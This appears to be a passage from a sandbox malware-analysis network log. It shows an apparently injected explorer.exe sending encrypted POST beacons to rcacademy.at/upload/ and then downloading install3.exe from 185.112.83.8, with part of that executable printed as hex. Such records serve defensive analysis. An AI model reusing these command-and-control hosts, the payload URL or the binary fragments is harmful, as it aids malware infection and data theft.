                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  37192.168.2.649860218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:39.704998016 CET22237OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://wadndxm.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 364
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:39.705285072 CET22237OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 4f 1b a7 b7
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuOk9EnN=!c5!y]\r^m6^TZO)|(G\3f#J^-{gq;d3+OZhdw`V<
                                                                                                                                  Dec 18, 2021 15:32:40.590053082 CET22245INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:40 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  38192.168.2.649866190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:41.016383886 CET22250OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://whrkpnnn.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 232
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:41.016406059 CET22250OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 55 53 b0 9c
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuUSX=nRyj$Y23vbq5hY#4]!- +)|y[Go>nc? ?w/;$NliC[ff
                                                                                                                                  Dec 18, 2021 15:32:42.024970055 CET22261INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:41 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  39192.168.2.649874148.0.74.22980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:42.534523964 CET22268OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://udjjtqdogg.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 185
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:42.534574986 CET22268OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 44 49 e6 ab
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[*k,vuDIW]m:B_bq7I&iP[2@;/)GTqe)_'6J)P1w&d
                                                                                                                                  Dec 18, 2021 15:32:43.260270119 CET22271INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:42 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.649761222.232.238.24380C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:43.752279997 CET1166OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://uexckctm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 317
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:43.752311945 CET1167OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 62 54 d2 98
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vubTrXno!L1sy<3b~\A=Ny4Mh`\W(hj(9PqS|q8c%&sk\m="zz
                                                                                                                                  Dec 18, 2021 15:31:44.949960947 CET1167INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:44 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  40192.168.2.649876218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:43.558549881 CET22275OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://cyvwwwlnbx.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 317
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:43.558617115 CET22276OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 28 20 ac 86
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[+k,vu( Bp_{Rk8Ym[Bs<t2!":195y7R~'q^^}5"jBG/M'JnXkqxk>[|
                                                                                                                                  Dec 18, 2021 15:32:44.724616051 CET22282INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:44 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  41192.168.2.649880211.59.14.9080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:45.008470058 CET22283OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://uwrfdbfbaa.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 309
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:45.008481979 CET22283OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 28 6b 2c 90 f5 76 0b 75 79 05 ea 88
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[(k,vuyc&NL'Dr+"HrPE:C$fx!YJIT(1'\\gwm *oG96;cv>d>qy1T7
                                                                                                                                  Dec 18, 2021 15:32:46.205908060 CET22290INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:45 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 44
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 53 3f 08 a5 69 58 b5 a0 14 bd c6 ad a3 2c 87 3a d4 f4 2f 09 5b 89 92 8a
                                                                                                                                  Data Ascii: #\(S?iX,:/[


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  42192.168.2.649882185.112.83.880C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:46.285000086 CET22291OUTGET /install3.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: 185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.339369059 CET22292INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Last-Modified: Fri, 17 Dec 2021 07:07:38 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  ETag: "8d927cc614f3d71:0"
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:43 GMT
                                                                                                                                  Content-Length: 94424
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 a6 2f 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 48 0e 00 00 00 00 00 00 00 00 00 00 88 5c 01 00 50 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 48 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 08 4f 43 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 10 4f 43 00 8d 45 a4 57 50 ff 75 08 ff
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@/@H\P.texthj `.rdatan@@.data@.ndata``.rsrcH@@U\}t+}FEuHOCHPuuu@BSV5OCEWPu
                                                                                                                                  Dec 18, 2021 15:32:46.339426994 CET22293INData Raw: 15 88 82 40 00 83 65 f4 00 89 45 0c 8d 45 e4 50 ff 75 08 ff 15 94 81 40 00 8b 7d f0 83 65 f0 00 8b 1d 60 80 40 00 e9 80 00 00 00 0f b6 46 52 0f b6 56 56 0f af 55 e8 8b cf 2b 4d e8 0f af c1 03 c2 89 4d 10 99 f7 ff 33 d2 8a f0 0f b6 46 51 0f af c1
                                                                                                                                  Data Ascii: @eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu@uE9}w~Xtev4X@EtU}jWEEL@vXWd@u5
